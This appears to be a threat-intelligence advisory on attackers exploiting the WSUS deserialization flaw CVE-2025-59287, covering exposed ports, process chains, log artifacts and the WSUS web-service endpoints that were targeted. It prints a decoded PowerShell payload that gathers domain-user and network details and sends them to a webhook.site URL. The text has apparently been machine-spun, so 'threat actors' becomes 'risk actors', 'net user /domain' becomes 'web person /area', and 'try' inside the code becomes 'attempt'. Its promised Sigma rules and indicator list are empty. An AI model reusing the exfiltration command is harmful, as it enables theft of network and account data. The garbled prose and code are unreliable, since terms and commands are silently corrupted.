Exploitation of Windows Server Update Services Remote Code Execution Vulnerability (CVE-2025-59287)

TL;DR: Huntress has noticed risk actors exploiting a Microsoft Windows Server Update Services (WSUS) vulnerability throughout 4 prospects; organizations ought to apply the replace from Microsoft as quickly as attainable.

Summary

On October 23, Microsoft released an out-of-band update for a distant code execution bug in Windows Server Update Services (WSUS); WSUS is a centralized Microsoft replace distribution service for IT directors. 

Starting round 2025-10-23 23:34 UTC, Huntress noticed risk actors concentrating on WSUS situations publicly uncovered on their default ports (8530/TCP and 8531/TCP) to use a deserialization vulnerability through the AuthorizationCookie (CVE-2025-59287).

Observed attacker behaviour:

• Attackers leveraged uncovered WSUS endpoints to ship specifically crafted requests (a number of POST calls to WSUS net companies) that triggered a deserialization RCE in opposition to the replace service.

• Exploitation exercise included spawning Command Prompt and PowerShell through the HTTP employee course of and WSUS service binary: (course of chains noticed)

• wsusservice.exe →
          cmd.exe →
              cmd.exe →
                 powershell.exe

• w3wp.exe →
          cmd.exe →
              cmd.exe →
                 powershell.exe

• A base64-encoded payload was decoded and executed in PowerShell; the payload enumerated servers for delicate community and person info and extracted outcomes to a distant webhook.

• Proxy networks have been utilized by the attackers to conduct and obfuscate exploitation.

What is Windows Server Update Services?

Windows Server Update Services (WSUS) allows IT directors to centrally handle and deploy Microsoft product updates. It offers a managed and totally managed technique for distributing updates launched via Microsoft Update.

In the wild, we noticed that Windows Servers with the default WSUS ports 8530/TCP (HTTP) and 8531/TCP (HTTPS) have been being focused by a risk actor to run a deserialized assault in opposition to the AuthorizationCookie often known as CVE-2025-59287 (https://nvd.nist.gov/vuln/detail/CVE-2025-59287)

The weblog by Hawktrace (“CVE-2025-59287 — WSUS Unauthenticated Remote Code Execution” (https://hawktrace.com/blog/CVE-2025-59287-UNAUTH)) goes additional into the proof of idea.

IOCs & Forensic Artifacts

C:Program InformationUpdate ServicesLogfilesSoftwareDistribution.log

at System.Data.DataSet.DeserializeDataSetSchema(SerializationInfo data, StreamingContext context,

at System.Runtime.Serialization.ObjectManager.DoFixups()

at System.Runtime.Serialization.ObjectManager.CompleteISerializableObject

System.Reflection.GoalInvocationException: Exception has been thrown by the goal of an invocation.

ErrorWsusService.9HmtWebServices.CheckReportingWebServiceReporting WebService WebException:System.Net.WebException: Unable to hook up with the distant server

C:inetpublogsLogFilesW3SVC*u_ex*.log

POST /ReportingWebService/ReportingWebService.asmx (get_server_id)

POST /SimpleAuthWebService/SimpleAuth.asmx (get_auth_cookie)

POST /ClientWebService/Client.asmx (get_reporting_cookie)

POST /ReportingWebService/ReportingWebService.asmx (send_malicious_event)

POST /ApiRemoting30/WebService.asmx

POST /ReportingWebService/ReportingWebService.asmx – 8530 – Windows-Update-Agent – 200

During tactical response engagements to lively exploitation, Huntress famous using proxy networks being leveraged to conduct exploitation.

Attacker Tradecraft

Beginning at round 2025-10-23 23:34 UTC, alerts have been triggered for suspicious exercise. It was noticed that cmd.exe and powershell.exe have been spawned through the grandparent processes of w3wp.exe and wsusservice.exe, performing enumeration on Windows servers.

Figure 1: wsusservice.exe → cmd.exe → cmd.exe → powershell.exe

The script decoded and executed a base64 payload that enumerated uncovered servers for delicate community and person knowledge. Subsequently, the data was taken to a distant webhook URL.

The PowerShell payload (with the base64 decoded) is as follows:

powershell -ec
attempt{$r= (&{echo https://[REDACTED]:8531; web person /area; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w=”http://webhook.site/[REDACTED]”;attempt{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl.exe -k $w –data-binary $r}

Figure 2: w3wp.exe → cmd.exe → cmd.exe → powershell.exe

The view of extracted info on the webhook website:

Figure 3: The webhook website with exfiltrated command output

Example of curl.exe exfiltrating the output of ipconfig /all to the webhook website.

Figure 4: Example of curl.exe exfiltrating the output of ipconfig /all to the webhook website.

We anticipate exploitation of CVE-2025-59287 to be restricted; WSUS shouldn’t be typically exposing ports 8530 and 8531. Across our associate base, we now have noticed ~25 hosts inclined.

Enumeration instructions noticed:

Remediations

Sigma Rules

Loading Gist…

Indicators of Compromise